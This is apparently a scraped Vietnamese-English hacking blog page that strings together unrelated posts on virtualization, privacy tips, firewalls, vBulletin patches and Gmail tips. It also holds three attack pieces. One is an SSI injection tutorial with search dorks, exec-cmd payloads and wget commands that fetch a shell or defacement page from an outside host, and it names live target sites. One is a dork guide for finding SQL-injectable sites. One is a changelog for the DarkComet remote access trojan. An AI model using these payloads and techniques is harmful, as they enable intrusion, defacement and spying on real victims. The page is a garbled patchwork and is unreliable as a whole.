Hacking - Buzz™ * Cảm Ơn Các Bạn Đã Ghé Thăm Website *

5 Virtualization Challenges

TAKE 1

Virtualization Laggards There’s a group of procrastinators out there who have yet to adopt virtualization from a production standpoint, preferring instead to relegate it to test and dev — or not implement it at all. What these laggards don’t know is that small and midsize businesses now have access to solutions that will enable them to adopt virtualization in a safe, reliable manner via preassembled virtualization solutions that come complete with rack, servers, storage, networking and power.

 TAKE 2

Economic Barriers When you look at the cost structures of modern datacenters — which are partially driven by virtualization — hardware costs have obviously come down and consume a much smaller percentage of budgets. However, the licensing and support costs associated with the software elements of both the hypervisor and virtualization management have expanded and become a much larger percentage of total spend. It all comes down to economic barriers that prevent some companies from adopting virtualization — they just don’t have enough money.

TAKE 3

Good News, Bad News The good news is that virtualization has solved a lot of capital expenditure problems. The bad news is found in a recent white paper written by a VP at Morgan Stanley that said, when you look at the costs of administering a virtual server, it requires nearly the same amount of activity that’s required to manage the old physical server. You’ve still got to initially deploy it, patch it, secure it, update it and at some point retire it. Also, virtual machines are free, so the number of server instances users are running in their infrastructures has gone through the roof. So even if it’s 50 percent of the cost of maintaining that virtual image versus a physical server, you have 10 times the number of virtual servers.

TAKE 4

Physical Layer Problems Despite its many benefits, server virtualization has created a problem in the physical layer because with virtual infrastructures, users have an expectation that they’re able to have a much more dynamic environment. For instance, they can spin systems up more quickly. Or, they might have put a device in place because from a virtual standpoint, it can be easily moved around. The problem is, the underlying physical infrastructure isn’t that dynamic and can’t keep up with the dynamism of the virtual layer. So when you think about the need to deploy or even change the physical layer underneath the virtual layer, customers have a hard time keeping up from both an operational expense standpoint and from a pure speed standpoint. This is the problem that converged infrastructures are trying to solve.

TAKE 5

Meeting Dynamic Demands There’s a challenge around virtual server operations management because when users are virtualizing their environments, it’s more difficult to spot performance issues because nobody knows where everything resides. Is the storage really on that device, or is it on another tier? Did it move over to that array, and where are the networking connections? Where’s that virtual server now, because with Distributed Resource Scheduler it can be moved around and consolidated? Also, because you’ve abstracted an environment, it’s hard to actually diagnose problems and manage performance. When you can’t see all the important elements, you can’t fix the problems.

Xem Thêm

 

Khóa các thiết bị di động bằng mật khẩu

Khóa các thiết bị di động bằng mật khẩu

thong-tin-ca-nhan1
Đặt mật khẩu cho các thiết bị cầm tay như điện thoại, máy tính bảng, hay máy tính xách tay mà mình sở hữu là điều đầu tiên mà bạn cần phải làm. Nhiều người luôn cho rằng việc này tốn thời gian mỗi khi họ cần sử dụng các thiết bị cầm tay của mình. Nhưng thực tế, lựa chọn này cũng tương tự như việc bạn đi ngủ hay khi đỗ xe mà không khóa.
Chính vì vậy, việc bỏ ra vài giây để nhập mật khẩu tưởng chừng như đơn giản, nhưng đây lại là “phòng tuyến”đầu tiên cho các thiết bị di động mà bạn sử dụng.
Đăng xuất khỏi hộp thư điện tử, mạng xã hội khi không sử dụng
thong-tin-ca-nhan2
Vì một lý do này hay khác, người dùng đa phần quên đăng xuất (log out) khỏi các trang mạng xã hội, hộp thư điện tử hay bất kỳ trang trực tuyến nào cần thông tin đăng nhập. Đối với người dùng sử dụng chính các thiết bị của mình (không phải các máy tính dùng chung), điều này có thể ít nguy hiểm.
Tuy nhiên, vẫn tiềm ẩn đâu đó nguy cơ các hoạt động trên Internet của họ bị theo dõi. Chính vì vậy, hãy luôn nhớ thao tác log out khỏi những trang web cần thông tin đăng nhập của cá nhân để bảo vệ chính mình.

Hạn chế cung cấp các thông tin cá nhân khi không cần thiết

thong-tin-ca-nhan3
Việc cung cấp thông tin cá nhân như địa chỉ email, số điện thoại là điều mà bạn cũng phải chú ý. Hãy thử mường tượng trường hợp một người lạ mặt gặp và hỏi số điện thoại cá nhân của bạn, đương nhiên bạn sẽ không cung cấp cho anh ta thông tin mà anh ta cần. Tuy nhiên, nếu anh ấy đến trong một bộ đồng phục của một dịch vụ, cửa hàng nào đó, có thể nhiều người sẽ cung cấp số điện thoại khi được hỏi đến.
Vì vậy, hãy luôn cân nhắc trước khi đưa cho ai đó các thông tin cá nhân của mình. Dù rằng đôi khi những thông tin đó được dùng để giúp người bán hàng hay một dịch vụ đưa ra những lựa chọn tối ưu cho nhu cầu mua sắm của bạn.

Mã hóa máy tính cá nhân

thong-tin-ca-nhan4
Tuy “nhiệm vụ” này nghe có vẻ phức tạp, đối lập với tiêu chí đặt ra là những mẹo đơn giản nhất cho người dùng, nhưng việc này cũng không quá phức tạp và rất cần thiết. Với người dùng MAC OS, việc mã hóa máy tính nghĩa là bạn sẽ phải có một chiếc “chìa khóa” riêng để mở sử dụng máy tính và các dữ liệu bên trong nó. Hệ điều hành MAC đã tích hợp sẵn tính năng này. Bạn chỉ cần bật tùy chọn Turn on FileVault trong thẻ FileVault của mục Settings > Privacy là xong.
Với người dùng Windows, tốt nhất bạn nên sử dụng công cụ của hãng thứ ba như Bitlocker để mã hóa dữ liệu của mình.

Với người dùng Gmail

thong-tin-ca-nhan5
Nếu đang dùng dịch vụ mail của Google, bạn hãy sử dụng phương pháp “2-step verification” (tạm dịch 2 bước xác minh người dùng). Về cơ bản, phương pháp này sẽ biến chiếc điện thoại của bạn thành một thiết bị an ninh lưu động. Mỗi khi cần đăng nhập Gmail từ một máy tính mới, bạn sẽ phải cung cấp một mã bí mật được gửi riêng đến chiếc điện thoại của bạn.
Điều này có nghĩa là nếu ai có mật khẩu Gmail của bạn, họ cũng không thể nào đăng nhập được trên một máy tính khác, vì duy nhất bạn là người biết mã bí mật để đăng nhập vào tài khoản của mình.

Giới hạn người xem trên Facebook

thong-tin-ca-nhan6
Một thiết lập tuy đơn giản khác nhưng có thể giúp bảo vệ quyền riêng tư là việc giới hạn người xem Profile ở mức “Friends”. Để làm điều này, bạn chỉ cần vào mục Privacy Settings trên Facebook của mình, nhấn chọn lựa chọn Friends là xong.
Bạn cũng có thể tạo riêng một “điều kiện” xem Profiles bằng việc lựa chọn mục Custom, tuy nhiên, cần chú ý trong việc lựa chọn ai sẽ là người được quyền xem Profiles của bạn hay những gì mà bạn viết lên tường nhà.

Xóa cookies và lịch sử trình duyệt

thong-tin-ca-nhan7
Đa phần người dùng Internet ít khi xóa cookies và lịch sử duyệt web của trình duyệt mà mình sử dụng. Bạn hãy tập cho mình thói quen xóa lịch sử trình duyệt sau một thời gian nhất định – vì điều này cũng giúp làm giảm nguy cơ thông tin cá nhân của bạn bị đánh cắp. Nếu quá bận rộn, có thể thiết lập trình duyệt xóa lịch sử duyệt web cũng như các cookies một cách hoàn toàn tự động sau khi kết thúc phiên làm việc.
Với trình duyệt Firefox, bạn có thể mở Options > Privacy, chọn tùy chọn “Never remember history” là xong. Với Internet Explorer, bạn mở menu ”Tools > Internet Options” rồi đánh dấu check vào mục có tên ”Delete Browsing History on exit”. Riêng với trình duyệt Chrome, trước hết, bạn sử dụng tổ hợp phím Ctrl + H để mở thẻ lịch sử trình duyệt. Trong giao diện thẻ vừa mở, nhấn nút “Clear all browsing data”.

Sử dụng phần mềm giả mạo địa chỉ IP

thong-tin-ca-nhan8
Mỗi khi truy cập một trang web bất kỳ, bạn đã để lại “dấu vết” trên trang web đó dưới dạng thông tin về địa chỉ IP của bạn. Khi được phân tích cụ thể, thông tin này sẽ cung cấp vị trí hiện tại của bạn. Kẻ xấu có thể lợi dụng thông tin này để tấn công bạn bất cứ lúc nào. Vì thế, hãy tự bảo vệ mình bằng cách sử dụng các phần mềm giả mạo địa chỉ IP như Tor, Hide IP Pivacy hay Free IP Switcher.
Ngoài ra, bạn cũng có thể sử dụng các địa chỉ Proxy như HideMyAss.com ngay trên chính trình duyệt Internet mà mình đang sử dụng.

Xem Thêm

 

Tạo tường lửa miễn phí

ZoneAlarm Firewall

ZoneAlarm là một trong những tường lửa cá nhân hiệu quả và dễ sử dụng nhất hiện nay. Đây là một công cụ giúp những người làm việc trong môi trường văn phòng tránh được nhiều hiểm hoạ, với giao diện đơn giản ngay cả đối với người dùng nhiệp dư nhất.
tuonglua1
ZoneAlarm sẽ bảo vệ máy tính khỏi các Rootkit (thường được dùng để che giấu sự có mặt của các phần mềm nguy hiểm như trojans hay keylogger) và các kiểu xâm nhập máy tính một cách âm thầm khác. Máy tính sẽ được thiết lập lá chắn ngay trong quá trình khởi động bằng cơ chế Early Boot Protection.
Bên cạnh đó, khả năng kiểm soát chương trình (Program Control) giúp hạn chế tối đa hoạt động của các phần mềm nguy hiểm trên máy tính. Tính năng Firewall Hệ Điều Hành (OSFirewall™) giúp ngăn chặn những spyware khó diệt và những đe dọa bên sâu khỏi xâm nhập vào PC của bạn.

Privatefirewall

Privatefirewall là một ứng dụng tường lửa cá nhân và phát hiện xâm nhập bảo vệ máy tính của bạn từ các hacker và Trojan horse. Privatefirewall quản lý và cho phép kết nối mà nó biết được là tin cậy hoặc được ủy quyền, và ngăn ngừa bất cứ kết nối trái phép nào.
tuonglua2
Chương trình này cung cấp ba cấp độ bảo mật cài sẵn chỉ định bởi màu sắc, vậy để sử dụng chương trình bạn không cần phải là một chuyên gia an ninh mạng – các màu xanh, vàng, và màu đỏ chỉ ra mức độ bảo mật của chương trình, màu đỏ là cao nhất.
Mặt khác, người dùng có kinh nghiệm có thể tự cấu hình cấp độ bảo mật hiện tại của chương trình, bao gồm chặn các JavaScripts, ActiveX, cookie,… Điều phân biệt Privatefirewall với các chương trình tương tự khác là tính năng SecurePOP, tính năng này làm việc với Outlook và Outlook Express, và các chế độ tàng hình cho phép bạn giấu địa chỉ IP máy tính vì thế làm cho máy tính của bạn “vô hình”.

SmoothWall Express

SmoothWall Express là một trong số những phần mềm mã mở nhận được sự đánh giá rất cao của cộng đồng người dùng chuyên nghiệp, giải pháp hữu hiệu và không tốn chi phí khi xây dựng tường lửa cho hệ thống mạng.
tuonglua3
Một số sản phẩm mã nguồn mở, chất lượng tốt vẫn có thể mang đến niềm tin cho người dùng. Ngoài chi phí rẻ (thậm chí miễn phí), các ứng dụng mã mở thường nhận được sự hỗ trợ đáng kể từ phía cộng đồng. Hiện phần mềm tường lửa (firewall) SmoothWall Express (SWE) đã có phiên bản 3.0, được phát hành theo giấy phép GNU. Người dùng có thể tải về miễn phí.

TinyWall

Có nhiều cách để bạn có thể cấu hình cho Windows Firewall trong đó việc sử dụng công cụ của bên thứ ba là rất phổ biến và TinyWall là phần mềm như vậy. Đây là một giải pháp đơn giản, dễ dàng mà không làm ảnh hưởng đến hiệu suất hệ thống.
tuonglua4
Không có trình điều khiển bổ sung hoặc các thành phần kernal được cài đặt cùng, TinyWall sẽ cung cấp cho Windows Firewall một cấu hình an toàn với giao diện làm việc đơn giản, bạn có thể dễ dàng thiết lập những phần mềm, ứng dụng có thể truy cập mạng và ngoài danh sách an toàn đó ra tất cả sẽ bị chặn lại.
Phần mềm cũng sẽ cho phép bạn ngăn chặn các chương trình khác từ modifing hoặc ghi đè lên các thiết lập tường lửa của bạn. Nếu bạn đang tìm kiếm một giải pháp tường lửa cơ bản và đơn giản thì TinyWall có thể sẽ là sự lựa chọn phù hợp cho bạn.

Xem Thêm

 

Hướng dẫn khắc phục 2 lỗi bảo mật nghiêm trọng của vBulletin

SinhVienIT.NET---vbulletin-security-alert


2 lỗi mà mình nói đến là lỗi SQL Injection của mod Chang stat và lỗi CSRF để add plugin.

1. Lỗi SQL Injection của Changuondyu Statistics
Khi khai thác lỗi này, attacker sẽ lấy được gần như toàn bộ database của bạn nếu muốn. Và thông thường, cái attacker nhắm đến là table user. Khi lấy được 3 cột: userid, password và salt => Attacker có thể login vào tài khoản của bất kỳ user nào mà không cần biết password là gì (Với điều kiện là Admin không biết config đúng file config.php cùa vBB).
Để fix lỗi này, có 2 cách mình đề xuất các bạn có thể thực hiện.

Cách 1:
AdminCP->Plugin Manager->ChangUonDyU - Advanced Statistics - Get Data

Tìm:
PHP Code:
$foruminid $vbulletin->db->escape_string($_REQUEST['listforumid']); 
Thêm vào bên dưới
PHP Code:
//---Loại bỏ ký tự nguy hiểm tránh SQL injetion$foruminid preg_replace("/[^0-9,]+/","",$foruminid);//---End---By: Vũ Thanh Lai - SinhVienIT.Net 

Cách 2:
AdminCP->Plugin Manager->ChangUonDyU - Advanced Statistics - Get Data

Tìm:
PHP Code:
$foruminid $vbulletin->db->escape_string($_REQUEST['listforumid']); 
Thêm vào bên dưới
PHP Code:
//---Loại bỏ ký tự nguy hiểm tránh SQL injetion$foruminidx explode(',',$foruminid);
foreach(
$foruminidx as &$id)
{
    
$id=intval($id);
}
$foruminid=implode(',',$foruminidx);//---End---By: Vũ Thanh Lai - SinhVienIT.Net 


2. Lỗi CSRF
Với lỗi này, attacker phải có quyền từ SMod trở lên. Nếu nói đây là 1 lỗi thì cũng chưa chuẩn lắm. Vì nếu nó là 1 lỗi thì chả khác nào câu "Hacked by Admin"
Tuy nhiên, dù thế nào đi nữa, cái này cũng giúp 1 user có quyền SMod "leo thang đặc quyền được".

Cách khai thác lỗi này thì cũng đã được công bố chi tiết.

Để fix lỗi này mình đề xuất 2 cách.

Cách 1:
Đây là cách đơn giản nhất là bạn đổi thư mục AdminCP và không tiết lộ thư mục AdminCP mới cho bất kỳ ai biết.
Sau khi đổi nhớ sửa lại tên thư mục admin trong file config.php ở phần
PHP Code:
$config['Misc']['admincpdir'
Tuy nhiên, khi sử dụng cách này thì sẽ có thể gây ra 1 số mod có phần admincp hoạt động sai hoặc ko hoạt động... Nên khi dùng cách này các bạn cần lưu ý.


Cách 2:
Bạn sử dụng Mod này. Khi dùng mod này, mỗi lần có 1 request gửi đến AdminCP thì referer trong HTTP Header sẽ đc kiểm tra xem request đó đến từ trang nào trong forum. Nếu không phải từ AdminCP thì bạn phải click xác nhận thì request mới đc tiếp tục xử lý.

Attacker đã làm như thế nào ?
Thời gian gần đây, attacker hay đi lục lọi các forum có sử dụng mod Changuondyu Statistics để tìm cách đưa câu "Hacked by..." vào đó. Sau khi khai thác lỗi này, chúng sẽ login đc vào tài khoản của SMod hoặc Admin để lợi dụng tiếp lỗi thứ 2 bên trên để chèn shell. Và thế là xong

Các Admin đã ngây thơ như thế nào ?
Trong file config.php của vBulletin có 1 phần mà hầu hết các Admin đều bỏ qua đó là COOKIE SECURITY HASH
PHP Code:
$config['Misc']['cookie_security_hash'
Thông thường, các admin để trống phần này trong file config mà không hề biết tầm quan trọng của nó. Để hiểu nó quan trọng như thế nào. Mình sẽ nói chi tiết để các bạn hiểu cơ chế hoạt động của nó.

Khi 1 user login vào forum nếu có check dấu ghi nhớ để lần sau không phải login lại khi hết cookie timeout thì phía client sẽ có 3 cookie đc thiết lập.
cookieprefix_userid,cookieprefix_password và cookieprefix_remember

cái userid và remember chắc mình không cần nói, cái password nó không phải là password của người dùng, cũng không phải là password trong cột password của table user.
Nó là kết quả
PHP Code:
MD5(Cột_Password_Trong_table_User.$config['Misc']['cookie_security_hash']) 
Như vậy, nếu attacker khai thác đc 1 lỗi SQL Injection nào đó trên forum của bạn và lấy đc 1 số record trong table user mà giá trị cookie_security_hash bạn để trống trong file config.php thì tất nhiên, attacker sẽ dễ dàng login đc vào bất kỳ tài khoản nào bằng cách thiết lập cookie trên trình duyệt 3 cookie mình đã để cập bên trên.

Còn nếu bạn có thiết lập giá trị cookie_security_hash ? Attacker không thể biết đc giá trị này nếu chưa attack vào đc host của bạn hay có shell trên server. Như vậy, cho dù có lấy đc cả table user thì attacker cũng không thể nào login vào bất kỳ tài khoản nào cả (ngoại trừ trường hợp bạn sử dụng password quá đơn giản như 123456

Vì vậy, khi đọc xong bài này, hãy mở ngay file config của bạn lên và thêm 1 chuỗi ký tự bất kỳ vào $config['Misc']['cookie_security_hash'] nhé. Làm ngay và luôn kẻo bị attack nhé

Nguồn: Sinhvienit.net

Xem Thêm

 

10 mẹo giúp bạn làm chủ Gmail

Năm 2004, Gmail đã có một bước đột phá lớn với việc sử dụng hộp thư điện tử trên nền tảng web. Việc check mail trở nên nhanh hơn, giao diện dễ sử dụng hơn, và người dùng được hòm thư với dung lượng lưu trữ 1Gb. Đến nay, dung lượng lưu trữ cho phép đã lên gấp 10 lần, và số người sử dụng Gmail đã lên đến con số hàng triệu người trên khắp thế giới.
Nhưng thực tế, ngay cả khi bạn sử dụng Gmail hàng ngày, vẫn check mail đều đặn, bạn có thể vẫn chưa sử dụng hết những tính năng của nó. Với những mẹo dưới đây, bạn có thể hoàn toàn làm chủ gmail theo cách của bạn.
1. Sử dụng bộ lọc - Filters
10 mẹo giúp bạn làm chủ Gmail | Juno_okyo's Blog | http://junookyo.blogspot.com/
Quản lý hộp thư đến không hề dễ dàng, nhưng Gmail đã có sẵn công cụ hỗ trợ bạn. Bạn có thể sử dụng bộ lọc trong khi tìm kiếm, ví dụ hãy gõ vào thanh search “from:Facebook”, sau đó tạo bộ lọc để đánh dấu những thư được gửi đến từ Facebook thành những thư đã được đọc rồi (read – giả sử như bạn không muốn đọc những email thông báo từ Facebook). Hoặc tạo một bộ lọc cho những email được gửi đến từ người yêu của bạn, đánh dấu chúng là những thư quan trọng để đảm bảo bạn sẽ không bao giờ bỏ lỡ những email này. Sử dụng bộ lọc giúp bạn không bao giờ quên những email quan trọng và xoá bỏ những email không mong muốn.
2. Tận dụng chức năng tìm kiếm
Google là một công cụ tìm kiếm tuyệt vời. Và điều này cũng đúng với Gmail. Chức năng tìm kiếm của Gmail tương tác rất tốt với người dùng: hãy nhấn vào mũi tên ở phía bên phải khung tìm kiếm, bạn sẽ thấy được nhiều lựa chọn tìm kiếm hơn. Bạn có thể tìm kiếm những email có file đính kèm, hay sử dụng chức năng này để xoá những email không cần thiết, giúp bạn có thêm bộ nhớ.
10 mẹo giúp bạn làm chủ Gmail | Juno_okyo's Blog | http://junookyo.blogspot.com/
Nếu bạn muốn thực hiện lệnh tìm kiếm cụ thể hơn, ví dụ như tìm những email gửi trong ngày sinh nhật năm ngoái, hay vào bất kì năm nào, chức năng tìm kiếm cũng sẽ thực hiện tốt nhiệm vụ của nó. Tất nhiên, hiệu quả của việc tìm kiếm còn phụ thuộc vào số lượng email bạn nhận được hôm đó, cũng như số email tự động chúc mừng sinh nhật được gửi từ những diễn đàn bạn đăng kí.
3. Chia nhỏ hộp thư đến
Trong trang Gmail Settings, ở thẻ Inbox, bạn có thể tuỳ chỉnh cách sắp xếp email trong hộp thư đến và sử dụng tính năng Priority Inbox chỉ có ở Gmail. Còn nữa. Ở thẻ Labs bạn có thể tìm thấy rất nhiều chức năng kèm theo giúp bạn tuỳ biến hòm thư của mình, ví dụ như chức năng Multiple Inboxes. Nhưng hãy nhớ: bạn chỉ có thể sử dụng Multiple Inboxes khi bạn tắt chức năng Priority Inbox.
10 mẹo giúp bạn làm chủ Gmail | Juno_okyo's Blog | http://junookyo.blogspot.com/
Ở phía bên trái mỗi email, bạn có thể đánh dấu và lựa chọn đánh dấu sao – starred, đánh dấu là chưa đọc – unread hay đánh dấu email quan trọng – important, để rồi về sau bạn có thể dùng chức năng tìm kiếm tìm lại chúng dễ dàng qua các cú pháp “is:starred”, “is:unread” và “is:important”.
4. Ghép với các dịch vụ email khác
10 mẹo giúp bạn làm chủ Gmail | Juno_okyo's Blog | http://junookyo.blogspot.com/
Nếu bạn thường xuyên sử dụng tài khoản Yahoo hoặc Hotmail, nay lại muốn chuyển sang Gmail, bạn hoàn toàn có thể chuyển các email từ các dịch vụ khác về hòm thư Gmail. Bạn có thể tìm thấy lựa chọn này trong thẻ Accounts and Import ở trang Settings, các bước thực hiện rất đơn giản, và bạn hoàn toàn có thể sắp xếp các thư đó như bình thường. Ngoài ra, đây cũng là lựa chọn tốt nếu bạn muốn sao lưu các email quan trọng từ một hòm thư nào đó vào hòm thư Gmail.
5. Đánh dấu sao
Các lựa chọn về việc đánh dấu sao được hiển thị trong thẻ General ở trang Settings. Có tới 12 loại sao và kí tự có thể sử dụng, trong khi mặc định chỉ có một loại kí tự là dấu sao màu vàng.
10 mẹo giúp bạn làm chủ Gmail | Juno_okyo's Blog | http://junookyo.blogspot.com/
Bạn có thể đánh dấu các email theo các biểu tượng khác nhau để phân biệt các email công việc hay email gia đình, để đánh dấu những email quan trọng... Mỗi loại kí tự hay dấu sao đều có cấu trúc tìm kiếm riêng, ví dụ lệnh “has:green-star” sẽ giúp bạn tìm những email nào được đánh dấu bằng ngôi sao màu xanh lá.
6. Sử dụng các nhãn – labels.
Nhãn – labels – là một trong những chức năng tốt nhất của Gmail. Sử dụng nhãn giúp bạn sắp xếp và tìm kiếm các email nhanh hơn và dễ dàng hơn. Hãy thử dùng và bạn sẽ thấy ngay lợi ích của nó.
10 mẹo giúp bạn làm chủ Gmail | Juno_okyo's Blog | http://junookyo.blogspot.com/
Hãy nhớ rằng, các bộ lọc – filters – có thể gắn nhãn vào các email theo ý bạn. Ngoài ra bạn có thể sử dụng chức năng này để xoá các email cũ không cần thiết đã được gắn nhãn, ví dụ như lệnh “label:newsletter before:2011/11/16” giúp bạn tìm kiếm các email dán nhãn newsletter được gửi tới trước ngày 16/11/2011, và rồi việc còn lại chỉ là chọn và xoá.
7. Tăng hiệu quả hoạt động với Gmail
10 mẹo giúp bạn làm chủ Gmail | Juno_okyo's Blog | http://junookyo.blogspot.com/
Hiện tại có rất nhiều phần mềm của các hãng thứ ba và các extension mở rộng giúp tăng thêm hiểu quả và khả năng hoạt động của Gmail. Ví dụ, Rapportive có thể thêm thông tin người dùng từ Facebook, LinkedIn và Twitter vào danh sách liên lạc contact của bạn. Ứng dụng này nhanh, mượt, giống như là một chức năng vốn có của Gmail vậy. Một công cụ của hãng thứ ba khác, rất nổi tiếng, là Boomerang, giúp bạn hẹn thời gian gửi mail và nhắc nhở bạn về những email quan trọng nếu bạn quên không trả lời.
8. Điều chỉnh mật độ hiển thị email
10 mẹo giúp bạn làm chủ Gmail | Juno_okyo's Blog | http://junookyo.blogspot.com/
Bạn không thích có quá nhiều khoảng trống giữa các email trong danh sách, vậy hãy tìm trong phần settings, sẽ có lựa chọn cho bạn điều chỉnh về mật độ, số lượng thư hiển thị trên một trang.
9. Hẹn giờ gửi mail
10 mẹo giúp bạn làm chủ Gmail | Juno_okyo's Blog | http://junookyo.blogspot.com/
Đôi khi, bạn không muốn gửi ngay một email nào đó, nhưng bạn lại sợ mình sẽ quên mất. Hãy nhấn vào nút Send later bên trên cửa sổ soạn tin và chọn thời gian thích hợp.
10. Hãy thực hành tốt những kỹ năng cơ bản
Nếu bạn muốn thực sự làm chủ Gmail, hãy làm thuần thục những chức năng cơ bản của Gmail. Hãy nhớ bên trên cửa sổ soạn thư có một loạt các icon tiện ích, thử nhấn vào icon Link, bạn có thể chèn bất kì một link nào đó vào mail; ngoài ra, có một mẹo khác ở đây: bạn cũng có thể chèn link của một email khác vào email cần gửi.
10 mẹo giúp bạn làm chủ Gmail | Juno_okyo's Blog | http://junookyo.blogspot.com/
Và cuối cùng, một thủ thuật đơn giản nhưng ít người để ý. Nếu bạn muốn tìm những email gửi từ một địa chỉ nào đó, hãy đánh vào ô tìm kiếm cú pháp “from:diachiemail@gmail.com”.
Tham khảo: Gizmodo

Xem Thêm

 

SSI (server side include) injection, shell and deface Page uploading tutorial

SSI (server side include) is a web application exploit, you can put your codes remotly to vulenrable websites,
Server-side Include allowed you to upload files in multi extentions, but in .php extention you can't excute your shell, you have to rename shell.txt to shell.php
Lets Begin...

Dorks 
inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
Try any dork or find sites manually,
To check vulenrablity of websites enter these commands in username and password

<!--#echo var="DATE_LOCAL" -->
it Will show the Date

<!--#exec cmd="whoami"-->
it Will display which user is running on the server

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)
it Will show all files in the directory

<!-- #exec cmd="dir" --> (Windows)
it Will display all files in the directory
SSI (server side include) injection, shell and deface Page uploading tutorial | Juno_okyo's Blog 
for example enter
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
in username and password to view all files of website

now we have to upload our deface page or shell
to upload a deface page, host/upload your deface page anywhere
you can use pastehtml.com for it,
then enter this command in username and password
<!--#exec cmd="wget http://website.com/deface.html" -->
to view your deface page goto site.com/deface.html

to upload a shell on website you have to host your shell anywhere in .txt format
then enter this command in login
<!--#exec cmd="wget http://website.com/abc.txt" -->
to check your txt file is uploaded or not list all files using

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
now you have to chnage .txt extention to .php
to rename your txt file to php use this command
<!--#exec cmd="mv abc.txt abc.php" -->
now goto site.com/abc.php and acess your shell :)
live demo : http://www.fogstock.com/postinfo.html
http://www.fogstock.com/bin/Cklb 

Xem Thêm

 

Website Hacking: Creating Your Own Google Dorks And Find Vulnerability In Website

Website Hacking: Creating Your Own Google Dorks And Find Vulnerability In Website | Juno_okyo's Blog

A method of finding websites vulnerable to SQL injection is using what we call "dorks" 

Dorks : They are like search criteria in which a search engine returns results related to your dork. The process can be a little time consuming, but the outcome will be worth it after learning on how to use dorks.
Basic Formula of dork,

"inurl:."domain"/"dorks" "

So you would normally understand it like this:
"inurl"      =  input URL
"domain" =  your desired domain ex. .gov
"dorks"    =  your dork of your choice

Do you really think inurl: is the only google dork that you can use? Wrong there are many you can use! 

You can use following words instead of inurl : 

intitle:
inurl:
intext:
define:
site:
phonebook:
maps:
book:
froogle:
info:
movie:
weather:
related:
link:

All these also help yo find other things then vulnerables. 

Anyway now I am going to explain you how to use some for finding vulnerability in websites. 

1: intitle: 

You can use the intitle to find anything in the title of the website. Which also could be usefull to find downloads or anything else. 

intitle:rte/file_uploud

This is an example to find rte vulnerables. 

2: inurl: 

The inurl basicly looks for anything after the : in the site urls. 

inurl:index.php?id=

3: intext: 

you can find literally everything using intext, you could even use the inurl dorks whit this. 

intext:"powered by mybb"

Using it we could find certain messages in a site. Above message looks for all mybb forums. Which means if I ever find a vulnerability in mybb forum and know how to locate it! then I can find out every mybb forum vulnerability using this dork.

4: define: 

Google will define this massage and will look for what had this error for example, 

define:"sql syntax error"

5: site: 

Obvious, when we will use it, google will looks for a site . 

site:cocacola

Google will look for any site related with cocacola. 

6: phonebook: 

It will look for the phone number related to it given name. 

phonebook:wildhacker

7: maps: 

Google will look on google maps for your search. 

8: book: 

Google has an online library store. If you want to find interesting books use this dork. 

book:java language

This will look for any book gogole hase indexed whith java language in it. 

9: froogle: 

Used for froogle search instead of google. 

10: info: 

google looks for anything you inputted but only information about string which you have puted next to info: . 

info:firefox

Above dork will show you alot off things about firefox like what is firefox etc. 

11: movie: 

You can find information about movies on google using this dork. 

movie:watch hackers2 online

12: weather: 

You can find information about weather on google using this dork. 

weather: 21/12/2011 london

13: related: 

This will look for anything related to what you have entered next to related: . 

related:egg

Google responds whith sites about chickons laying eggs. 

14: link: 

This one will works better instead of only looking in search url, it will also look in the site for urls that possibly are vulnerable. 

link:index.php?id=

This is verry usefull I would say even more then inurl. 

Vulnerability Approach : 

Once you search website using above dorks, now its time to check whether the website is vulnerable to SQL injection or not, we simply put in a quote " ' " at the end of the url address.

So our site will look like this, 

http://www.site.com/index.php?id=123'

If the site is vulnerable, you will see the following error or something similar somewhere on the page. 

" Error executing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' ORDER BY date_added DESC' at line 1 "

If you get this, the site should be vulnerable. So far so good! 

Xem Thêm

 

Darkcomet Rat v5.31 (Final)


DarkComet-RAT v5 aka Fynlosky*
------------------------------
By DarkCoderSc

- [GUI] The main window had change, dirty buttons removed from the bottom and are now display as tabs in the title bar
- [GUI] Other options such as generate server / downloader / settings etc.. are in the button menu in the title bar then i gain in space for the SIN (static ip notifier)
- [GUI] The EULA/DISCLAMER had changed, read it carefully it contain also lot of informations in the last paragraphs about how to use darkcomet.
- [FUNC] The download file system had totally change, it still multithreaded that means you can download many files from many computers at the same time, but during the file download the current user file manager can't be used, then the transfer will be faster and of course far more stable.
- [FUNC] No more limitation in data sending, now for example you can kill 320 process at the same time, download 1000 files.
- [FUNC] The upload file system had totally change like for the download (see beyound)
- [GUI] Toast GUI had change a bit
- [GUI] File Manager GUI had totally change, it is now more userfriendly pro and less bloated of shit, GUI inspired by TV Software.
- [FUNC] Add usefull shortcuts in the top of both files list in file manager
- [FUNC] Download folder added with recusive option (FAST and STABLE)
- [FUNC] Search manager had been recoded and is now more use friendly, fast, stable and functionnal and the big advantage now it is fully multithreaded (Server and Client) you can cancel a search or cancel the listing after
the reception of the result etc.. it is also fully linked to the file manager to act on the search files easily.
- [GUI] Some icons changed, i try to uniformise all icons step by step
- [DEL] Control center logs removed because useless since few versions
- [DEL] Control center plugins manager removed because useless since many versions @TODO: Make a better one
- [FUNC] Remote shell bug fix for some countries, now it correctly show accents etc..
- [FUNC] Remote shell multithreading been recoded entirely, now it is fully stable
- [FIX] In the users list RAM is now correctly displayed in % used.
- [FUNC] Remote Desktop >> Now the picture compression is directly done by GDI+ API's more fast, stable and consume less memory
- [FIX] Remote Desktop been optimized in threading, speed and stability
- [FIX] Resizing image algorythm been optimized
- [FUNC] Quality bar added in desktop settings
- [FUNC] Remote control for desktop capture been improved
- [FIX] Webcam speed and memory usage is better now multithreading been optimized aswell
- [FUNC] Now you can change the quality of the picture in Webcam capture
- [FIX] A big bug fixed in remoteshell now it doesn't use all the CPU also the GUI change a little bit
- [GUI] New webcam capture design more friendly
- [FIX] Password support now FireFox 9
- [FUNC] SIN Users thumbnail multithreading been revisited and is now faster and stabler
- [FIX] SIN Users thumbnail resizing algo revisited and is also better now
- [FUNC] Main connection handler of the Client Socket was revised
- [FUNC] Main connection handler of the Server Socket was revised now user listing is more smooth fast and stable, it can handle more users
